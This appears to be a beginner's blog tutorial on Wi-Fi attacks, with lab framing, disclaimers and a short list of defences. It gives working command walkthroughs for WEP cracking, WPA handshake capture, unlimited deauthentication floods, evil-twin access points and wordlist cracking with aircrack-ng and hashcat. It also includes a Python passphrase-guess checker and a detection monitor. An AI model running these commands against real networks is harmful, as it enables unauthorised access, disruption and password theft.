A Beginner's Guide to Wi-Fi Attacks

by Akshay

February 21, 2026

Understand the Basics of Wi-Fi and How to Attack Wi-Fi

Wireless networks are ubiquitous, connecting our devices to the internet seamlessly. However, this convenience comes with vulnerabilities that attackers can exploit. In this guide, we delve into Wi-Fi attacks, focusing on theoretical knowledge and practical steps for beginners. This is for educational purposes and aims to foster awareness about securing wireless networks.


What is Wi-Fi

The importance of the Internet in our lives is universally acknowledged without the need for any justification. Wi-Fi is the technology that connects our devices to the global network, the Internet. This seamless connection to the Internet appears to be wireless from our devices, which is true to some extent. Our devices are connected wirelessly to the router, which acts as a bridge between us and the Internet, and the router is connected to the Internet via a wired connection.

To connect to Wi-Fi, we turn it on from our devices, and it lists all the available Wi-Fi networks around us. This list comprises the access points (often the routers) that are broadcasting Wi-Fi signals with a unique SSID (network name). You can connect to any of these if you know the correct password, also known as a pre-shared key (PSK). Once you successfully connect to a network via Wi-Fi, you will be assigned an IP address inside that network, which uniquely identifies you and lets you communicate with other devices. It is just like becoming a member of a family and being given a name that the whole family trusts.


Wi-Fi's Pivotal Role in Organisations

Most organisations rely on the Internet for their business functioning. Using a wired connection for all employees to connect to the Internet raises concerns about cost, efficiency, and flexibility at work. So, organisations use Wi-Fi for their networks to connect their employees to the Internet. As the employees connect to the organisation's network, they form a family of interconnected devices. The devices inside the network can communicate with each other, sending requests to one another and responding to them. Organisations tend to recruit trustworthy and professional employees to avoid any misuse of their privileges inside the network.

However, a malicious actor from outside the organisation could still see the broadcasted Wi-Fi SSID of the organisation's network when they turn their Wi-Fi on. This may not seem to be a problem as the attacker does not know the password, but the attacker actually has some other plans as well!

Wi-Fi Network Diagram


Attacks on Wi-Fi

There are several techniques attackers use to exploit Wi-Fi technology. The techniques discussed here are solely for educational purposes. Unauthorised attempts to access or compromise networks are illegal and may lead to severe legal consequences. With that in mind, here are some of the most popular techniques:

Evil Twin Attack

In this attack, the attacker creates a fake access point whose name closely resembles one of your trusted Wi-Fi access points. Of course, it cannot be exactly the same. If the trusted Wi-Fi's name is "Home_Internet", the attacker creates a fake access point named "Home_Internnet" or something similarly hard to tell apart. The attack starts with the attacker sending de-authentication packets to all the users connected to the legitimate access point. The users then face repeated disconnections from the network. Out of frustration, they are likely to open the list of available access points to troubleshoot, where they will find the attacker's network with an almost identical name and a stronger signal. They connect to it, and once connected, the attacker can see all their traffic to and from the Internet.

Rogue Access Point

This attack's objective is similar to that of the evil twin attack. In this attack, the attacker sets up an open Wi-Fi access point near or inside the organisation's physical premises to make it available to users with good signal strength. The users inside the organisation may accidentally join this network if their devices are set to connect automatically to open Wi-Fi. The attacker can intercept all their communication after the users connect to this rogue access point.

WPS Attack

Wi-Fi Protected Setup (WPS) was created to let users join their Wi-Fi with an 8-digit PIN instead of remembering a complex password. However, on some networks this PIN is vulnerable because of an insecure configuration. The attack works by initiating a WPS handshake with the router and capturing the router's response, which contains data derived from the PIN that can be brute-forced. Brute-forcing that data recovers the PIN and, with it, the Pre-Shared Key (PSK).

WPA/WPA2 Cracking

Wi-Fi Protected Access (WPA) was created to secure wireless communication. It uses a strong encryption algorithm; however, the security of the protocol depends heavily on the length and complexity of the Pre-Shared Key (PSK). When cracking WPA, attackers start by sending de-authentication packets to a legitimate user of the Wi-Fi network. Once disconnected, the user tries to reconnect, and a 4-way handshake with the router takes place. Meanwhile, the attacker puts their adapter into monitor mode and captures that handshake. With the handshake captured, the attacker can attempt to recover the password with brute-force or dictionary attacks on the capture file.


WPA/WPA2 Cracking In Detail

As mentioned above, WPA/WPA2 cracking begins by listening to Wi-Fi traffic to capture the 4-way handshake between a device and the access point. Since waiting for a device to connect or reconnect can take some time, deauthentication packets are sent to disconnect a client, forcing it to reconnect and initiate a new handshake, which is captured. After the handshake is captured, the attacker can crack the password (PSK) by using brute-force or dictionary attacks on the captured handshake file.

The 4-way Handshake

The WPA password cracking process involves capturing a Wi-Fi network's handshake to attempt a PSK (password) decryption. First, an attacker places their wireless adapter into monitor mode to scan for networks, then targets a specific network to capture the 4-way handshake. Once the handshake is captured, the attacker runs a brute-force or dictionary attack using a tool like aircrack-ng to attempt to match a wordlist against the passphrase.

The WPA 4-way handshake is a process that helps a client device (like your phone or laptop) and a Wi-Fi router confirm they both have the right "password" or Pre-Shared Key (PSK) before securely connecting. Here's a simplified rundown of what happens:

  1. Router sends a challenge: The router (or access point) sends a "challenge" to the client, asking it to prove it knows the network's password without directly sharing it.
  2. Client responds with encrypted information: The client takes this challenge and uses the PSK to create an encrypted response that only the router can verify if it also has the correct PSK.
  3. Router verifies and sends confirmation: If the router sees the client's response matches what it expects, it knows the client has the right PSK. The router then sends its own confirmation back to the client.
  4. Final check and connection established: The client verifies the router's response, and if everything matches, they finish setting up the secure connection.

💡 This handshake doesn't directly reveal the PSK itself but involves encrypted exchanges that depend on the PSK.
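To make the rundown above concrete, here is a Python model of messages 1 and 2 of the handshake with both sides' computations. It is added for this page and is not code from the original post or from aircrack-ng. It derives the PMK from the passphrase and SSID (checked against the IEEE 802.11i test vector for passphrase "password" and SSID "IEEE"), expands it into the PTK using both MAC addresses and both nonces, and verifies the client's MIC with the KCK. MSG2_HEADER is a constructed stand-in for the EAPOL-Key header fields, and the MAC addresses and passphrase in the demo are constructed as well. The last function shows why the note above matters to a defender: nothing secret crosses the air, yet whoever holds the captured ANonce, message 2 and the two MACs can test a passphrase guess offline at the cost of one PBKDF2 run, so passphrase length and randomness, not the cipher, decide how long a capture resists guessing.

```python
"""WPA2-Personal key derivation and handshake MIC check.

Constructed model of the exchange described above, written for this page; it is not code
from the original post or from aircrack-ng. Standard library only, so it runs offline.
Real EAPOL-Key frames carry more header fields than MSG2_HEADER (a constructed stand-in).
"""
import hashlib
import hmac
import os

PTK_LABEL = b"Pairwise key expansion"          # label fixed by IEEE 802.11i
MSG2_HEADER = b"\x02\x03\x00\x75\x02\x01\x0a"  # constructed stand-in for EAPOL-Key header bytes


def derive_pmk(passphrase, ssid):
    """PMK (the PSK) per 802.11i: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key, label, data, nbytes):
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out, i = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk, aa, spa, anonce, snonce):
    """PTK for CCMP (384 bits): KCK(16) || KEK(16) || TK(16). Inputs are sorted so both sides agree."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, PTK_LABEL, data, 48)


def eapol_mic(kck, frame_with_zero_mic):
    """WPA2 key MIC: HMAC-SHA1 over the EAPOL-Key frame (MIC field zeroed), truncated to 16 bytes."""
    return hmac.new(kck, frame_with_zero_mic, hashlib.sha1).digest()[:16]


def client_message2(pmk, ap_mac, client_mac, anonce, snonce):
    """Client side of message 2: derive the PTK, then fill in the MIC over the SNonce frame."""
    ptk = derive_ptk(pmk, ap_mac, client_mac, anonce, snonce)
    unsigned = MSG2_HEADER + snonce + b"\x00" * 16
    return MSG2_HEADER + snonce + eapol_mic(ptk[:16], unsigned)


def verify_message2(pmk, ap_mac, client_mac, anonce, msg2):
    """AP side: read SNonce from the frame, derive the same PTK and compare MICs in constant time."""
    snonce = msg2[len(MSG2_HEADER):len(MSG2_HEADER) + 32]
    ptk = derive_ptk(pmk, ap_mac, client_mac, anonce, snonce)
    expected = eapol_mic(ptk[:16], msg2[:-16] + b"\x00" * 16)
    return hmac.compare_digest(msg2[-16:], expected)


def simulate_handshake(passphrase, ssid, ap_mac, client_mac):
    """Messages 1 and 2 with both parties holding the same passphrase.
    Returns (ap_accepts_client, anonce, msg2): exactly what a passive listener sees on the air."""
    pmk = derive_pmk(passphrase, ssid)
    anonce = os.urandom(32)                                            # message 1: AP -> client
    snonce = os.urandom(32)
    msg2 = client_message2(pmk, ap_mac, client_mac, anonce, snonce)   # message 2: client -> AP
    return verify_message2(pmk, ap_mac, client_mac, anonce, msg2), anonce, msg2


def candidate_matches(candidate, ssid, ap_mac, client_mac, anonce, msg2):
    """Offline check of one passphrase guess against captured material: one PBKDF2 run (4096
    rounds) plus a PRF and an HMAC. Nothing secret crossed the air, yet each guess can be
    verified, so the passphrase's length and randomness decide how long the capture resists."""
    return verify_message2(derive_pmk(candidate, ssid), ap_mac, client_mac, anonce, msg2)


if __name__ == "__main__":
    ap, client = bytes.fromhex("aabbccddeeff"), bytes.fromhex("112233445566")  # constructed MACs
    accepted, anonce, msg2 = simulate_handshake("correct horse battery", "Home_Internet", ap, client)
    print("AP accepted client:", accepted)
    for guess in ("password", "Home_Internet1", "correct horse battery"):
        print(f"{guess!r:>25} matches capture:",
              candidate_matches(guess, "Home_Internet", ap, client, anonce, msg2))
```

Run it directly to see the AP accept the client and two wrong guesses fail against the captured material; only the guess equal to the real passphrase verifies.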


Understanding Wi-Fi Security Protocols

Before diving into attacks, it's crucial to understand the protocols that secure Wi-Fi networks:

1. WEP (Wired Equivalent Privacy):

  • Introduced in 1997, WEP was an early attempt at securing wireless networks.
  • Uses RC4 encryption but is weak due to short initialization vectors (IVs).

2. WPA (Wi-Fi Protected Access):

  • Replaced WEP and introduced stronger encryption via TKIP.
  • Vulnerable to dictionary attacks on pre-shared keys.

3. WPA2:

  • Implements AES encryption and is more secure than WPA.
  • Vulnerable to KRACK (Key Reinstallation Attacks) and brute-force attacks.

4. WPA3:

  • The latest standard with stronger encryption and forward secrecy.
  • Not entirely immune to attacks like Dragonblood.

Setting Up a Lab for Wi-Fi Penetration Testing

To safely practice Wi-Fi attacks, set up a controlled lab environment:

1. Hardware Requirements:

  • Wireless network adapter that supports monitor mode and packet injection.
  • A test router with WEP/WPA/WPA2 configurations.
  • A secondary device for connecting to the test network.

2. Software Requirements:

  • Kali Linux: Pre-installed tools for Wi-Fi penetration testing.
  • Aircrack-ng Suite: Essential for capturing and cracking Wi-Fi keys.
  • Wireshark: For analyzing packets.

3. Environment:

  • Isolate your lab network to avoid legal or ethical violations.
  • Use a test network under your control.

Practical Wi-Fi Attack Techniques

1. WEP Cracking

Objective: Exploit weak IVs in WEP encryption to recover the network key.

Tools: Aircrack-ng suite.

Steps:

Step 1 — Start Monitor Mode:

airmon-ng start wlan0

Replace wlan0 with your wireless adapter's name.

Step 2 — Capture Packets:

airodump-ng wlan0mon

Note the target network's BSSID and channel.

Step 3 — Target the Network:

airodump-ng --bssid <BSSID> --channel <CH> -w output wlan0mon

Replace <BSSID> and <CH> with the target's BSSID and channel.

Step 4 — Inject Packets:

aireplay-ng --arpreplay -b <BSSID> wlan0mon

This increases the number of IVs captured.

Step 5 — Crack the Key:

aircrack-ng -b <BSSID> output*.cap

2. WPA/WPA2 Handshake Capture and Brute-Force

Objective: Capture the 4-way handshake and use brute-force or dictionary attacks.

Steps:

Step 1 — Enable Monitor Mode:

airmon-ng start wlan0

Step 2 — Capture Handshake:

airodump-ng --bssid <BSSID> --channel <CH> -w handshake wlan0mon

Step 3 — Deauthenticate a Client (to force handshake):

aireplay-ng --deauth 10 -a <BSSID> -c <CLIENT_MAC> wlan0mon

Replace <CLIENT_MAC> with the MAC address of a connected device.

Step 4 — Crack the Handshake:

aircrack-ng -w /path/to/wordlist.txt -b <BSSID> handshake*.cap

3. Deauthentication Attack

Objective: Disconnect clients from the network.

Tool: aireplay-ng

Steps:

Step 1 — Identify the client and access point (AP):

airodump-ng wlan0mon

Step 2 — Send deauth packets:

aireplay-ng --deauth 0 -a <BSSID> wlan0mon

⚠️ Using 0 means sending unlimited deauth packets. Use responsibly in a controlled environment only.


4. Evil Twin Attack

Objective: Create a rogue AP to trick users into connecting.

Tools: airbase-ng, Wireshark

Steps:

Step 1 — Set Up Fake AP:

airbase-ng -e "Fake_AP" wlan0mon

Step 2 — Enable Internet Sharing (optional): Configure IP forwarding and NAT to provide internet access.

Step 3 — Monitor Traffic: Use Wireshark or tcpdump to analyze captured packets.
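For the Deauthentication Attack and Evil Twin sections above, the defender's counterpart is a wireless monitor that recognises both on the air. The following Python is added for this page and is not code from the original post or from the Aircrack-ng suite: it parses raw 802.11 management frames as a monitor-mode capture delivers them, counts deauthentication frames per BSSID in a sliding window, and checks every beacon's SSID against an inventory of authorised BSSIDs, flagging a protected SSID broadcast by an unknown BSSID as well as lookalike names such as the "Home_Internnet" example earlier on the page. AUTHORISED_APS, the thresholds, the MAC addresses and every frame built in run_demo() are constructed for the example.

```python
"""Monitor-mode detection for the deauthentication and evil-twin techniques above.

Added example for this page; not code from the original post or the Aircrack-ng suite.
AUTHORISED_APS, the thresholds and every frame built in run_demo() are constructed.
"""
import struct
from collections import defaultdict, deque

MGMT_BEACON = 0x80          # frame-control byte 0: type 0 (management), subtype 8
MGMT_DEAUTH = 0xC0          # type 0 (management), subtype 12
DEAUTH_THRESHOLD = 5        # deauth frames per BSSID that count as a flood ...
WINDOW_SECONDS = 2.0        # ... within this sliding window
LOOKALIKE_DISTANCE = 2      # edit distance at which an SSID is treated as imitating a protected one
AUTHORISED_APS = {"Home_Internet": {"aa:bb:cc:dd:ee:ff"}}   # constructed: SSID -> legitimate BSSIDs


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)

def mac_bytes(s):
    return bytes(int(x, 16) for x in s.split(":"))

def parse_mgmt(frame):
    """Management frame header: FC(2) Duration(2) DA(6) SA(6) BSSID(6) Seq(2), then the body."""
    if len(frame) < 24 or (frame[0] & 0x0C) != 0:     # bits 2-3 of byte 0 hold the frame type
        return None
    return {"subtype": frame[0] & 0xF0, "src": mac_str(frame[10:16]),
            "bssid": mac_str(frame[16:22]), "body": frame[24:]}

def beacon_ssid(body):
    """Skip the 12 fixed bytes (timestamp, interval, capability) and walk the tagged parameters."""
    i = 12
    while i + 2 <= len(body):
        tag, length = body[i], body[i + 1]
        if tag == 0:                                    # element ID 0 is the SSID
            return body[i + 2:i + 2 + length].decode("utf-8", "replace")
        i += 2 + length
    return None

def edit_distance(a, b):
    """Levenshtein distance, used to catch 'Home_Internnet'-style lookalike SSIDs."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


class WifiMonitor:
    def __init__(self):
        self.deauth_times = defaultdict(deque)          # bssid -> timestamps inside the window
        self.alerts = []

    def process(self, ts, frame):
        m = parse_mgmt(frame)
        if m is None:
            return
        if m["subtype"] == MGMT_DEAUTH:
            q = self.deauth_times[m["bssid"]]
            q.append(ts)
            while q and ts - q[0] > WINDOW_SECONDS:     # drop timestamps that left the window
                q.popleft()
            if len(q) == DEAUTH_THRESHOLD:              # alert once, when the threshold is reached
                self.alerts.append(f"deauth flood: {len(q)} frames for {m['bssid']} in {WINDOW_SECONDS}s")
        elif m["subtype"] == MGMT_BEACON:
            ssid = beacon_ssid(m["body"])
            if ssid in AUTHORISED_APS:
                if m["bssid"] not in AUTHORISED_APS[ssid]:
                    self.alerts.append(f"rogue AP: '{ssid}' advertised by unknown BSSID {m['bssid']}")
            elif ssid is not None:
                for known in AUTHORISED_APS:
                    if edit_distance(ssid.lower(), known.lower()) <= LOOKALIKE_DISTANCE:
                        self.alerts.append(f"lookalike SSID: '{ssid}' resembles '{known}' (from {m['bssid']})")


def build_deauth(bssid, client, reason=7):
    """Constructed deauthentication frame addressed from the AP to one client."""
    header = bytes([MGMT_DEAUTH, 0]) + b"\x00\x00" + mac_bytes(client) + mac_bytes(bssid) * 2 + b"\x00\x00"
    return header + struct.pack("<H", reason)

def build_beacon(bssid, ssid):
    """Constructed beacon: broadcast DA, timestamp, interval, capability, then the SSID element."""
    header = bytes([MGMT_BEACON, 0]) + b"\x00\x00" + b"\xff" * 6 + mac_bytes(bssid) * 2 + b"\x00\x00"
    return header + b"\x00" * 8 + struct.pack("<HH", 100, 0x0411) + bytes([0, len(ssid)]) + ssid.encode()

def run_demo():
    """Replays a constructed flood and three beacons through the monitor; returns the alerts raised."""
    mon = WifiMonitor()
    for n in range(6):                                  # six deauths in half a second against the real AP
        mon.process(0.1 * n, build_deauth("aa:bb:cc:dd:ee:ff", "11:22:33:44:55:66"))
    mon.process(1.0, build_beacon("aa:bb:cc:dd:ee:ff", "Home_Internet"))    # legitimate: no alert
    mon.process(1.1, build_beacon("de:ad:be:ef:00:01", "Home_Internet"))    # same SSID, unknown BSSID
    mon.process(1.2, build_beacon("de:ad:be:ef:00:02", "Home_Internnet"))   # lookalike name
    return mon.alerts


if __name__ == "__main__":
    for alert in run_demo():
        print(alert)
```

On a real deployment the frames would come from a monitor-mode interface or a pcap (for example via scapy); the header parsing and the alert logic stay the same, and the inventory in AUTHORISED_APS is what turns a stream of beacons into a rogue-AP decision.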


5. KRACK Attack

Objective: Exploit weaknesses in WPA2's 4-way handshake to decrypt traffic.

Tool: Custom scripts or pre-built tools available in Kali Linux.

📝 The KRACK (Key Reinstallation Attack) targets the third step of the WPA2 4-way handshake. By manipulating and replaying cryptographic handshake messages, the attacker can force nonce reuse, which breaks the encryption.


Best Practices to Secure Wi-Fi Networks

Securing your Wi-Fi network is essential to prevent unauthorized access. Follow these best practices:

  1. Upgrade Protocols: Avoid WEP and WPA; use WPA2 or WPA3.
  2. Strong Passwords: Use long, complex passwords to prevent brute-force attacks.
  3. Firmware Updates: Regularly update router firmware to patch vulnerabilities.
  4. MAC Address Filtering: Restrict network access to known devices.
  5. Network Segmentation: Separate guest networks from internal ones.
  6. Disable WPS (Wi-Fi Protected Setup): Prevent PIN-based attacks.

🎬 Video Walkthrough: 3 Levels of WiFi Hacking

The following steps and commands are demonstrated in the video tutorial below. This walkthrough covers how to capture a WPA/WPA2 handshake and attempt to crack the password using the Aircrack-ng suite on Kali Linux.

⚠️ Important: Only perform these steps on networks you own or have explicit written permission to test. Unauthorized access is illegal.


Step 1 — Identify Your Wireless Interface

Open a terminal and check your network interfaces:

ip a

Look for interfaces starting with wlan (e.g., wlan0). This is your wireless adapter.


Step 2 — Kill Conflicting Processes

Before enabling monitor mode, kill any processes that might interfere:

airmon-ng check kill

This stops NetworkManager and other services that could conflict with monitor mode.


Step 3 — Enable Monitor Mode

Switch your wireless adapter into monitor mode — this allows it to capture all nearby Wi-Fi traffic:

airmon-ng start wlan0

Your interface will now be renamed to something like wlan0mon. You can verify with:

ip a

💡 Monitor mode will temporarily break your internet connection. This is normal.


Step 4 — Scan for Nearby Wi-Fi Networks

Use airodump-ng to discover all nearby Wi-Fi networks:

airodump-ng wlan0mon

This will display a list of networks with important details:

  • BSSID — The MAC address of the router
  • CH — The channel the network is broadcasting on
  • ESSID — The network name (SSID)
  • ENC — The encryption type (WPA2, WPA, WEP)

Press Ctrl+C to stop scanning once you've identified your target network. Note down the BSSID and Channel.


Step 5 — Capture the 4-Way Handshake

Now target the specific network and start capturing packets, waiting for a handshake:

airodump-ng -d <TARGET_BSSID> -c <CHANNEL> -w <OUTPUT_FILENAME> wlan0mon

Example:

airodump-ng -d AA:BB:CC:DD:EE:FF -c 6 -w capture wlan0mon

  • -d — Filter by the target BSSID (router MAC address)
  • -c — Lock to the target channel
  • -w — Output filename prefix (creates capture-01.cap, etc.)

Keep this terminal running. You need to wait for a device to connect/reconnect to capture the handshake.


Step 6 — Force a Handshake with Deauthentication Attack

If no handshake is being captured, you can speed things up by forcing devices to disconnect and reconnect. Open a new terminal and run:

Deauthenticate all devices from the router:

aireplay-ng -0 10 -a <ROUTER_BSSID> wlan0mon

Deauthenticate a specific client:

aireplay-ng -0 10 -a <ROUTER_BSSID> -c <CLIENT_MAC> wlan0mon

Example:

aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon

  • -0 — Deauthentication attack mode
  • 10 — Number of deauth packets to send (use a small number to avoid disruption)
  • -a — Target router BSSID
  • -c — (Optional) Specific client MAC address

After sending deauth packets, go back to your first terminal. You should see "WPA handshake: AA:BB:CC:DD:EE:FF" appear in the top-right corner. Once captured, press Ctrl+C to stop.


Step 7 — Crack the Password with Aircrack-ng

Now use aircrack-ng to attempt cracking the captured handshake with a wordlist:

aircrack-ng -w <PATH_TO_WORDLIST> <CAPTURE_FILE>

Example using the popular rockyou.txt wordlist:

aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap

💡 The rockyou.txt or rockyou2024.txt wordlist comes pre-installed on Kali Linux and contains over 14 million common passwords. If the target password is in the wordlist, aircrack-ng will find it.

If successful, aircrack-ng will display: "KEY FOUND! [ password_here ]"


Step 8 — (Advanced) Crack with Hashcat for GPU Acceleration

For faster cracking, convert the .cap file and use Hashcat with GPU power:

Convert the capture file to the hc22000 format that Hashcat mode 22000 reads (hcxpcapngtool is part of the hcxtools package; cap2hccapx produces the older .hccapx format, which belongs to the older mode 2500, not 22000):

hcxpcapngtool -o capture.hc22000 capture-01.cap

Run Hashcat:

hashcat -m 22000 capture.hc22000 /usr/share/wordlists/rockyou.txt

  • -m 22000 — Hash mode for WPA/WPA2 (EAPOL and PMKID material in hc22000 format)
  • Hashcat uses your GPU, which is significantly faster than CPU-based cracking

Step 9 — Stop Monitor Mode

When you're done, restore your normal network connectivity:

airmon-ng stop wlan0mon

Then restart NetworkManager to reconnect to the internet:

systemctl start NetworkManager

Quick Command Reference

| Step | Command |
|------|---------|
| Check interfaces | ip a |
| Kill conflicts | airmon-ng check kill |
| Start monitor mode | airmon-ng start wlan0 |
| Scan networks | airodump-ng wlan0mon |
| Capture handshake | airodump-ng -d <BSSID> -c <CH> -w output wlan0mon |
| Deauth attack | aireplay-ng -0 10 -a <BSSID> wlan0mon |
| Crack with aircrack | aircrack-ng -w /usr/share/wordlists/rockyou.txt output-01.cap |
| Crack with hashcat | hashcat -m 22000 capture.hc22000 wordlist.txt |
| Stop monitor mode | airmon-ng stop wlan0mon |
| Restart networking | systemctl start NetworkManager |



Conclusion

Wi-Fi security is a critical aspect of cybersecurity. Understanding how attacks work helps in building stronger defenses. Always practice ethical hacking in controlled environments and never attempt unauthorized access to any network.

⚠️ Disclaimer: This guide is for educational purposes only. Unauthorized attempts to access or compromise networks are illegal and may lead to severe legal consequences.


Happy Ethical Hacking! 🚀
